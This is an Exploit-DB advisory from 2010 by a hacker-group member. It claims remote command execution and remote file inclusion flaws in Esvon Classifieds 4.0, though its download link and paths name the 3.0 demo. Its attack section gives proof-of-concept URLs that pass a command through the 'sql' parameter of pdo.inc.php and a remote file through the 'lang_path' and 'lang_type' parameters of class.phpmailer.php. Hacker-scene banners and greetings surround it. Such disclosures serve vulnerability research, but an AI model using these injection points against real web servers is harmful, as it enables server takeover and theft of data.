Esvon Classifieds 4.0 - Multiple Vulnerabilities

EDB-ID:

14817

CVE:





Platform:

PHP

Date:

2010-08-27


1 ########################################## 1
0 I'm Sn!pEr.S!Te Hacker member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ------------------------------------------------------------------------------
# Remote Command Execution Vulnerability and Remote File Inclusion Vulnerability 
# ------------------------------------------------------------------------------
# Esvon Classifieds ( pdo.inc.php ) (class.phpmailer.php )
--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 27-8-2010
#  [+] Script : Programs » Esvon Classifieds#  
# [+]Version: [4.0] # 
# [+] Download:http://www.esvon.com/products/esvon_cl_3_0_demo.zip
 ---------------------------------------------------------------
-=[ exploit ]=-

command:

http://localhost/esvon_cl_3_0_demo/inc/pdo.inc.php?sql= [inj3ct0r command] 
  
http://127.0.0.1/esvon_cl_3_0_demo/inc/pdo.inc.php?sql= [inj3ct0r command]
----------------------------------------------------------------------

File inclusion :

http://localhost/esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_path=[inj3ct0r RFI]
  
http://127.0.0.1/esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_type=[inj3ct0r RFI]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
================== Greetz ==================================================
SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited

===========================all my friend ===================================
* PrX Hacker * Hacker Boy * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi |
* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA   |